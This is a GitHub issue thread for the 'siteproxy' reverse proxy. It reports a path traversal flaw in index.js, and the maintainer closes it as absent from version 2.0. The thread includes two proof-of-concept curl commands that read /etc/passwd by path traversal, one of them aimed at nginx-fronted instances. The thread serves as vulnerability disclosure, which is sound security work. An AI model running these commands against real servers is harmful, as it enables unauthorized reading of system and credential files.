search

netptop / siteproxy

reverse proxy, online proxy, 反向代理,免翻墙访问Youtube/twitter/Google, 支持github和telegram web登录(请注意不要通过不信任的代理进行登录)。支持DuckDuckGo AI Chat(可免费访问chatGPT3.5和Claude3)
MIT License
2.09k stars 1.08k forks source link

path traversal vulnerability #67

Closed kdxcxs closed 9 months ago

kdxcxs commented 1 year ago

There is no path traversal chek in index.js when sending local files, so it's possible to read any file by path traversal.

poc: curl --path-as-is http://siteproxy.your.domain.name/../../../etc/passwd

image.png

kdxcxs commented 1 year ago

For instances proxied by nginx:

curl --path-as-is http://siteproxy/\?/../../../../../etc/passwd

netptop commented 9 months ago

doesn't exist on siteproxy2.0